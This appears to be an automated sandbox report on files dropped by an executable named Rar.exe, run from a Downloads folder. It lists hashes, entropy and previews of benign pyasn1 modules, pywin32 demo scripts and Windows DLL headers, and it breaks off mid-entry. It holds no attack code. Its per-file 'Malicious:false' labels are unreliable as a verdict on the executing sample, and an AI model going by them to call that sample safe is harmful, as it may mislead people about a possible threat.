                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3000
                                                                                                                                                                                      Entropy (8bit):4.5830719416660335
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:vO+cMC/KIO00QLMmp6B8GnMRIHoE+hjmQLcjgFZm6jD0Uz:lhP0oB8GneIIvhmQ2gD/Vz
                                                                                                                                                                                      MD5:587BFBFAAF894ACD62F3E0BCC65BA960
                                                                                                                                                                                      SHA1:5D91F22ED1CD502965153378802F94965AC15936
                                                                                                                                                                                      SHA-256:6A527D65F0C64C0B0F7B28074FAC8E3536A05240A39608A3F36617A4F690FFEF
                                                                                                                                                                                      SHA-512:2F63695880F3F895A38AEA11A21BBBE907E4A83486B5FEB499AF95D25F7976C9E253FD92234E6C417A8FED7E9388C9C799847F32F8CD5C59974062BCBA9183D7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from pyasn1 import error..__all__ = ['TagMap']...class TagMap(object):. """Map *TagSet* objects to ASN.1 types.. Create an object mapping *TagSet* object to ASN.1 type... *TagMap* objects are immutable and duck-type read-only Python. :class:`dict` objects holding *TagSet* objects as keys and ASN.1. type objects as values... Parameters. ----------. presentTypes: :py:class:`dict`. Map of :class:`~pyasn1.type.tag.TagSet` to ASN.1 objects considered. as being unconditionally present in the *TagMap*... skipTypes: :py:class:`dict`. A collection of :class:`~pyasn1.type.tag.TagSet` objects considered. as absent in the *TagMap* even when *defaultType* is present... defaultType: ASN.1 type object. An ASN.1 type object callee *TagMap* returns for any *TagSet* key no
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):109212
                                                                                                                                                                                      Entropy (8bit):4.559454973892344
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:0palpev97k14M552Q/CdKLsheAYN91q5/DlCyIMlCyUk0:0pg552Q/CdKLsheAYNC/RCLwCjk0
                                                                                                                                                                                      MD5:641899262B2840210B758764251F3D78
                                                                                                                                                                                      SHA1:2862A1AFCC02D5EA4DE6C63E7845DE5CB01B8A67
                                                                                                                                                                                      SHA-256:067BB6807740F3851730BB606F82D76C72394D8C3E90A96396C27B76427C29F2
                                                                                                                                                                                      SHA-512:EEDC344E781AF3CF946515AD315489AC09D5B0CE9897A92928DD4F4BDBEB63AAF6D9130461E5BA5C1A7FBEA2AC866A0403874FB5668E9772B38B3DE6DD3CF427
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import math.import sys..from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.compat import integer.from pyasn1.type import base.from pyasn1.type import constraint.from pyasn1.type import namedtype.from pyasn1.type import namedval.from pyasn1.type import tag.from pyasn1.type import tagmap..NoValue = base.NoValue.noValue = NoValue()..__all__ = ['Integer', 'Boolean', 'BitString', 'OctetString', 'Null',. 'ObjectIdentifier', 'Real', 'Enumerated',. 'SequenceOfAndSetOfBase', 'SequenceOf', 'SetOf',. 'SequenceAndSetBase', 'Sequence', 'Set', 'Choice', 'Any',. 'NoValue', 'noValue']..# "Simple" ASN.1 types (yet incomplete)...class Integer(base.SimpleAsn1Type):. """Create |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Typ
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5284
                                                                                                                                                                                      Entropy (8bit):4.634060804764904
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:vO+GivMUzElXAlmg5MpiKVcn0ehDJphw2OxfLLGTjux6Ll0XVEVVqP6KZaD0lWoS:l9UUn00DJ/yxTowTXVoqPmSWoTlk
                                                                                                                                                                                      MD5:E1917FE595D824C50A0A7A31420EB0F1
                                                                                                                                                                                      SHA1:75A8DFFBA503489D88DA7F4907EE63680111E9B5
                                                                                                                                                                                      SHA-256:F89EDE8F486A763176F61D79D1DB4D98821C19C30183FCBE9CAA9CA33BE4FB8F
                                                                                                                                                                                      SHA-512:D82794B3A9698C5B06E408A60DA860802B32C548B3B8D93A6047083940D4EB71D69DA6C9601B0850C0B39161DCA58D2313CCAA82062C6F411A59B21867FA2393
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import datetime..from pyasn1 import error.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ..__all__ = ['ObjectDescriptor', 'GeneralizedTime', 'UTCTime']..NoValue = univ.NoValue.noValue = univ.noValue...class ObjectDescriptor(char.GraphicString):. __doc__ = char.GraphicString.__doc__.. #: Default :py:class:`~pyasn1.type.tag.TagSet` object for |ASN.1| objects. tagSet = char.GraphicString.tagSet.tagImplicitly(. tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 7). ).. # Optimization for faster codec lookup. typeId = char.GraphicString.getTypeId()...class TimeMixIn(object):.. _yearsDigits = 4. _hasSubsecond = False. _optionalMinutes = False. _shortTZ = False.. class FixedOffset(datetime.tzinfo):. """Fixed offset in minutes east from UTC."
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:magic text file for file(1) cmd, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):139
                                                                                                                                                                                      Entropy (8bit):4.654604444359773
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SZ+FlJQcZ6MRxJjZuXyDelc/KOnoQjDcVVfGg9n:SZ+FTQcIMjglpOnxX1g9n
                                                                                                                                                                                      MD5:52BB9E0303D810D33AFB630073561870
                                                                                                                                                                                      SHA1:8B640F65295E5D25D78DFBAFD039D20580547F54
                                                                                                                                                                                      SHA-256:1863FC80A555C8EB97C875CDFA0366F624C4E39B0487D84D96536D06371A5A4D
                                                                                                                                                                                      SHA-512:D4858D11932BF97A5998B76B886FA3774B94FA9DA2953B29349A8F6E494D3BFF5FC93EBF137361A483F077A17AAD0F2B4E65AC5B13844D8D3028431FB2FCAF9B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Magic utility that "redirects" to pythoncomxx.dll.import pywintypes..pywintypes.__import_pywin32_system_module__("pythoncom", globals()).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):46592
                                                                                                                                                                                      Entropy (8bit):5.5834665335727225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:QCRX2oJzD63IB2XjXx8lpyUs8jcdlT8TNrIl08jWf4Mf4MMRt4MtuPn2JbU:QCRX2ocYBSXCyUs8jcdlT9qfP87QPn2Z
                                                                                                                                                                                      MD5:8707C1C5C09AF9C8EDEB693501D80459
                                                                                                                                                                                      SHA1:07023271F01FA17252ECE632F9E06B5CFDAE72F4
                                                                                                                                                                                      SHA-256:1301C55E13B2E3AD11976474A8C8BC544628615391D26E13C8C982948572CBB4
                                                                                                                                                                                      SHA-512:2880158CFFC0ACC058DD353D636A28E6C777478E8E5BDE65BD7D58012382D785E5E47900A09D80B5EAF6F40A39759E61CF4568F04FDB373F97813745B9E56698
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........CE.."+.."+.."+..Z..."+..I*.."+.W/.."+.W(.."+.W..."+.."*.O"+.W*.."+..W".."+..W..."+..W).."+.Rich."+.........PE..L.../..d.................B...p.......2.......`....@.......................................@....................................................................\...(...T...................H...........@............`...............................text....@.......B.................. ..`.rdata..pD...`...F...F..............@..@.data...|...........................@....rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):79872
                                                                                                                                                                                      Entropy (8bit):6.012195383549612
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:eDt5SreqMB+0FLpO+Mqs8jcdx82MjxDnFxhkxDMamn0VH:XeH4mQlvXMjjHkxDMamn0VH
                                                                                                                                                                                      MD5:FC3C025CE86123910C283BB65D622DB7
                                                                                                                                                                                      SHA1:A8124727527D35C8716CFBC9AC1756A80D71EAED
                                                                                                                                                                                      SHA-256:48E2508B3D6B1AD9C3688E5EF7E22A58A678835465A43DA9A91E5B3B9C798072
                                                                                                                                                                                      SHA-512:3EA998B4C6A8DCD6011F9D1D2D275BD8C348BC54ED9409CF359081CD7EBDBB41E3E521D11E1C6D1A9909E1FA43938633C3757C84C41B5152EC29389B0A84018F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~z..~z..~z..w.2.zz.....zz......|z..j...xz..,...}z..,...rz..,...hz..~z...z..,...{z.....xz......z......z..Rich~z..........................PE..L...(..d...........!.....................................................................@.............................H............P..D....................`......l...T...............................@............................................text...C........................... ..`.rdata...i.......j..................@..@.data...T....0......................@....rsrc...D....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5127088
                                                                                                                                                                                      Entropy (8bit):6.861766335751532
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:98304:bJZczGW8ke6KllNHsyBqGeQVrrNW2XkGMWrGFLOAkGkzdnEVomFHKnPUUdMG:XczGRGKLBZ/YGkGMWKFLOyomFHKnPr1
                                                                                                                                                                                      MD5:E76B52D11DB435D36453D26C8B446A8F
                                                                                                                                                                                      SHA1:6E20C17ED973E38D4A3F26CFC020AF05FF9A6EEA
                                                                                                                                                                                      SHA-256:E422C9366A53536A35E307EF301F08661C28C29B7FCDA1B454333C6A41C6BB21
                                                                                                                                                                                      SHA-512:486BE0145D5E439D3D9F5191A4A49EA3685619796557CD7A361117C25A279EE7B94A9FF70C4D73ADBE839A6CE508AB15692DDD8FD6EABC3DBEF18B68D6B0C67F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8'..Vt..Vt..VtI.Su..VtI.Qu..VtI.Ru..Vt...t..Vt..Wu..Vt..Ru..Vt..Uu..VtI.Wu..Vt..WtX.Vt..Su..Vt.._u7.Vt..Vu..Vt...t..Vt..Tu..VtRich..Vt................PE..L......a.........."!......3..r......`L......../..............................`N.....M.N...@A............................L.....4...... 5...............N..'....J.|...p.3.8............................a..@.............4.......3......................text.....3.......3................. ..`.data...H.....3.......3.............@....idata..DS....4..T....4.............@..@.didat........5.......4.............@....rsrc........ 5.......4.............@..@.reloc..|.....J......tJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7718
                                                                                                                                                                                      Entropy (8bit):4.592237270639104
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:BpQF0mSEkAkZaWIXg7MnjUh/DzlibXD+54SWh:BpQF01EkAkYWV7MnAhi
                                                                                                                                                                                      MD5:DAB1FA8EF5CBB32C53DAAADE0373E944
                                                                                                                                                                                      SHA1:9454BC395B84842739E17BB8EEAC4B28A411E0D1
                                                                                                                                                                                      SHA-256:59077C392496D99BF4909EB6FB63E8F377BCDCF9950E87DBC482940F3570034B
                                                                                                                                                                                      SHA-512:A38349EC5F88D9B03E2E863DE58F1C915A513A69CEF4CDEEAE716F266865C398AC180FFFBBDFB303DB73D96D1E9A1C5D317BE7990042C60CF50674CF2FBC9A5D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# basictimerapp - a really simple timer application..# This should be run using the command line:.# pythonwin /app demos\basictimerapp.py.import sys.import time..import timer.import win32api.import win32con.import win32ui.from pywin.framework import app, cmdline, dlgappcore...class TimerAppDialog(dlgappcore.AppDialog):. softspace = 1.. def __init__(self, appName=""):. dlgappcore.AppDialog.__init__(self, win32ui.IDD_GENERAL_STATUS). self.timerAppName = appName. self.argOff = 0. if len(self.timerAppName) == 0:. if len(sys.argv) > 1 and sys.argv[1][0] != "/":. self.timerAppName = sys.argv[1]. self.argOff = 1.. def PreDoModal(self):. # ..sys.stderr = sys.stdout. pass.. def ProcessArgs(self, args):. for arg in args:. if arg == "/now":. self.OnOK().. def OnInitDialog(self):. win32ui.SetProfileFileName("pytimer.ini"). self.title = win32ui.GetProfileV
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5955
                                                                                                                                                                                      Entropy (8bit):4.794297003026542
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:k9oKEUAIAd+zTwGqMhWEtMdJjqsXfFfPHpqhN22Vk20EO/:keDdQ4MUE2jqsXfFfP47TO/
                                                                                                                                                                                      MD5:313F44AF5BAF16427E808A61EBAE9159
                                                                                                                                                                                      SHA1:588458E41D82A3E10DB5C7D6432CA7361960A620
                                                                                                                                                                                      SHA-256:8BAE84415E88C3B9445F20959AA8BD176F55196B56B2BAA029FD71A48C231E03
                                                                                                                                                                                      SHA-512:F5146BCD14A052B9C4AA818C5ACDD468EB4014A1CC554CD74551C82770D4501E03FE4C3911B10435088F8C631399F870837F3C2311BC7EBB44DA79356A45B547
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo of an Application object that has some custom print functionality...# If you desire, you can also run this from inside Pythonwin, in which.# case it will do the demo inside the Pythonwin environment...# This sample was contributed by Roger Burnham...import win32api.import win32con.import win32ui.from pywin.framework import app.from pywin.mfc import afxres, dialog, docview..PRINTDLGORD = 1538.IDC_PRINT_MAG_EDIT = 1010...class PrintDemoTemplate(docview.DocTemplate):. def _SetupSharedMenu_(self):. pass...class PrintDemoView(docview.ScrollView):. def OnInitialUpdate(self):. ret = self._obj_.OnInitialUpdate(). self.colors = {. "Black": (0x00 << 0) + (0x00 << 8) + (0x00 << 16),. "Red": (0xFF << 0) + (0x00 << 8) + (0x00 << 16),. "Green": (0x00 << 0) + (0xFF << 8) + (0x00 << 16),. "Blue": (0x00 << 0) + (0x00 << 8) + (0xFF << 16),. "Cyan": (0x00 << 0) + (0xFF << 8) + (0xFF << 16),. "Magenta": (
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1449
                                                                                                                                                                                      Entropy (8bit):4.870913567569013
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1WMpp:zg7RHNYacPSia0LcbsoYY1Axn
                                                                                                                                                                                      MD5:152D8AE021879EF2FE84E06B833C3674
                                                                                                                                                                                      SHA1:684FDFC6C9F8383C7239F1509604769DEE545C23
                                                                                                                                                                                      SHA-256:051E9274A22C04483C2B500E679A0485657A49419E2EBC7957E5CDA9D3081D27
                                                                                                                                                                                      SHA-512:47DCBFFFEFB9A9098FA6B053FEF2BF3E4829E4AA38BDA685E12A140C1F7F7EA2EA217AE9841AFB7078099CFF78EDA9E185A7432BD9FCD18FE1F9B5EA745AEA6B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                      Entropy (8bit):4.736697406546076
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JE/qQMkkaaTgagdmVAurDZSpAaegADHvkCzCjYTXE7HWr3jJPi7VLKypX:K/qNkzacaggJHZSpSg+kCzXkoMJLHh
                                                                                                                                                                                      MD5:4DDD10BD9A61F61210C5C4B081D3FB30
                                                                                                                                                                                      SHA1:4FE9FEF8A41E4A970E8DA111C74474D29667112C
                                                                                                                                                                                      SHA-256:B7CFCC0A1D3CE27A08E5842FD13CC4CF19D5B8C0F4DB814572F480D9B0B55EEB
                                                                                                                                                                                      SHA-512:694C82C10F1C92DC9A1E1063F7EB5A2E1B6EFAEE8FBE159E6B5B1FBBFC891954398A8CEA807AFD8796B0D6E3CFEBF2D463255DEF4F9E649C8596B873150995B9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# dlgappdemo - a demo of a dialog application..# This is a demonstration of both a custom "application" module,.# and a Python program in a dialog box..#.# NOTE: You CAN NOT import this module from either PythonWin or Python..# This module must be specified on the commandline to PythonWin only..# eg, PythonWin /app dlgappdemo.py..import sys..import win32ui.from pywin.framework import app, dlgappcore...class TestDialogApp(dlgappcore.DialogApp):. def CreateDialog(self):. return TestAppDialog()...class TestAppDialog(dlgappcore.AppDialog):. def __init__(self):. self.edit = None. dlgappcore.AppDialog.__init__(self, win32ui.IDD_LARGE_EDIT).. def OnInitDialog(self):. self.SetWindowText("Test dialog application"). self.edit = self.GetDlgItem(win32ui.IDC_EDIT1). print("Hello from Python"). print("args are:", end=" "). for arg in sys.argv:. print(arg). return 1.. def PreDoModal(self):. sys.stdout = sys.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1514
                                                                                                                                                                                      Entropy (8bit):4.945406162781541
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:xnC/FCkAXwIRImPSHdA56ZgAKRHWS9HvYrVzysaD74+UKGrgMhr0AKAwjNWpX:GMkmS9DZghR9xYrVHaHJU4MhA9DWh
                                                                                                                                                                                      MD5:3E856FE847A2C367C3877120AFDA3263
                                                                                                                                                                                      SHA1:D3209422FEAFA6379D68D2903F80E335917D5B4C
                                                                                                                                                                                      SHA-256:4CA762DDEFE6B2B8AB613571DEE6B698CAD21464BCDF8334A9F60813A38F599B
                                                                                                                                                                                      SHA-512:0196C8A6AB7824116E5948D548E1B31B4D21DF9F8BF3971F7C67FCA61557A5B84FE7F73251E8E8319C89093385CFED3A9A73308B62361AD2BC2333FF0658FD2A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# dojobapp - do a job, show the result in a dialog, and exit..#.# Very simple - faily minimal dialog based app..#.# This should be run using the command line:.# pythonwin /app demos\dojobapp.py...import win32api.import win32con.import win32ui.from pywin.framework import app, dlgappcore...class DoJobAppDialog(dlgappcore.AppDialog):. softspace = 1.. def __init__(self, appName=""):. self.appName = appName. dlgappcore.AppDialog.__init__(self, win32ui.IDD_GENERAL_STATUS).. def PreDoModal(self):. pass.. def ProcessArgs(self, args):. pass.. def OnInitDialog(self):. self.SetWindowText(self.appName). butCancel = self.GetDlgItem(win32con.IDCANCEL). butCancel.ShowWindow(win32con.SW_HIDE). p1 = self.GetDlgItem(win32ui.IDC_PROMPT1). p2 = self.GetDlgItem(win32ui.IDC_PROMPT2).. # Do something here!.. p1.SetWindowText("Hello there"). p2.SetWindowText("from the demo").. def OnDestroy(self, msg):.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1626
                                                                                                                                                                                      Entropy (8bit):4.791008026710751
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Q8ZkoKG8Cyk9sPY2rtqkTAN5pAwT9AXSgXktAabXYHF4tkhahyNghbx8V/UK9wZU:Qp4ykOk5pTuhzazY2tkhswghbNrY
                                                                                                                                                                                      MD5:7C7C396C6E867204696DA73D48BBBC20
                                                                                                                                                                                      SHA1:49E9550CF67F18C0F0C748513F0201E8BEC5102C
                                                                                                                                                                                      SHA-256:8A7EA09735358CB953592F59DEB8343A070DC670B890E23FA3B106ACF71F3C4B
                                                                                                                                                                                      SHA-512:A9162E777365CE49DBE784A2AB141C85FA6FBC0126FB0667929289CC1091E13503744DA86E477FFA9C6E9CEC3C5259433B24D451309D1B239B6388452E4440D1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:##.## helloapp.py.##.##.## A nice, small 'hello world' Pythonwin application..## NOT an MDI application - just a single, normal, top-level window..##.## MUST be run with the command line "pythonwin.exe /app helloapp.py".## (or if you are really keen, rename "pythonwin.exe" to something else, then.## using MSVC or similar, edit the string section in the .EXE to name this file).##.## Originally by Willy Heineman <wheineman@uconect.net>...import win32con.import win32ui.from pywin.mfc import afxres, dialog, window.from pywin.mfc.thread import WinApp...# The main frame..# Does almost nothing at all - doesnt even create a child window!.class HelloWindow(window.Wnd):. def __init__(self):. # The window.Wnd ctor creates a Window object, and places it in. # self._obj_. Note the window object exists, but the window itself. # does not!. window.Wnd.__init__(self, win32ui.CreateWnd()).. # Now we ask the window object to create the window itself.. self._o
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3081
                                                                                                                                                                                      Entropy (8bit):4.569496612186034
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:s9hGduwsgSUORQjLlGW5LPJuB8fh/bEvNXZpi835aWt5S8AZ1lFn:s9W3sgS9KPLhBwVXm835o8A/n
                                                                                                                                                                                      MD5:839F37CE522EA5F143D5CDF218C7F924
                                                                                                                                                                                      SHA1:80DB27F6CA8E178642235DCB60701724ECC6CBCF
                                                                                                                                                                                      SHA-256:BC4E723F913CD75D7A2F6764951E6FF1B8B3ECAEB42B4A0712EE7248D3FCEE43
                                                                                                                                                                                      SHA-512:38D9864FD58B7F5D0EFDFEE07DC5ECFDB10423A27D82DE429B612F30CFD70654FD28E8E878DB0352E0980B9D7C40D5FF70A5F2EA8F86BBA6F5D2973D5E2D4C8C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# cmdserver.py..# Demo code that is not Pythonwin related, but too good to throw away.....import _thread.import sys.import traceback..import win32api.from pywin.framework import winout...class ThreadWriter:. "Assign an instance to sys.stdout for per-thread printing objects - Courtesy Guido!".. def __init__(self):. "Constructor -- initialize the table of writers". self.writers = {}. self.origStdOut = None.. def register(self, writer):. "Register the writer for the current thread". self.writers[_thread.get_ident()] = writer. if self.origStdOut is None:. self.origStdOut = sys.stdout. sys.stdout = self.. def unregister(self):. "Remove the writer for the current thread, if any". try:. del self.writers[_thread.get_ident()]. except KeyError:. pass. if len(self.writers) == 0:. sys.stdout = self.origStdOut. self.origStdOut = None.. def getwriter(
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2507
                                                                                                                                                                                      Entropy (8bit):4.762840106777906
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:0bf1d4PcR5nzuRT+hTQ89d+OmCTqAT1h+Ziyi48ZqFVyhFoRiV1tWVVChFoR+Lc0:0r1d4PcDzud+hTQ89gOmpp8ZOiV1tWD0
                                                                                                                                                                                      MD5:EC4B22954C3BA2A557C8C581BA450C19
                                                                                                                                                                                      SHA1:C0302FF926737CD773CE5153589F91AF165313FE
                                                                                                                                                                                      SHA-256:5BCF0283E79FD93F828479F6BFA0A25E235B44505B76C839B370DFFA9F24E9E6
                                                                                                                                                                                      SHA-512:6913B55CBA1453B278C142090F69838F163859C8A17D4CC6151FF82621746799B2DE18D8A948D6C0C332CEDAE0E5A8816E79314B022AF2315730D47AF88930FC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#.# Window creation example.#.# .This example creates a minimal "control" that just fills in its.# .window with red. To make your own control, subclass Control and.# .write your own OnPaint() method. See PyCWnd.HookMessage for what.# .the parameters to OnPaint are..#..import win32api.import win32con.import win32ui.from pywin.mfc import dialog, window...class Control(window.Wnd):. """Generic control class""".. def __init__(self):. window.Wnd.__init__(self, win32ui.CreateWnd()).. def OnPaint(self):. dc, paintStruct = self.BeginPaint(). self.DoPaint(dc). self.EndPaint(paintStruct).. def DoPaint(self, dc): # Override this!. pass...class RedBox(Control):. def DoPaint(self, dc):. dc.FillSolidRect(self.GetClientRect(), win32api.RGB(255, 0, 0))...class RedBoxWithPie(RedBox):. def DoPaint(self, dc):. RedBox.DoPaint(self, dc). r = self.GetClientRect(). dc.Pie(r[0], r[1], r[2], r[3], 0, 0, r[2], r[3] // 2)...def M
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1494
                                                                                                                                                                                      Entropy (8bit):4.882251681504472
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1W6OTpp:zg7RHNYacPSia0LcbsoYY1Amn
                                                                                                                                                                                      MD5:CCA77E5A4F4DEEA9BEEC7DB407318C2E
                                                                                                                                                                                      SHA1:4E50484EECAF7DA6D9EF279D153AA2A47B203A4C
                                                                                                                                                                                      SHA-256:276A4BFD2D9CCDE4AAA7323DD51B98E3E39F3C6C962E560814B19E56441C8AA0
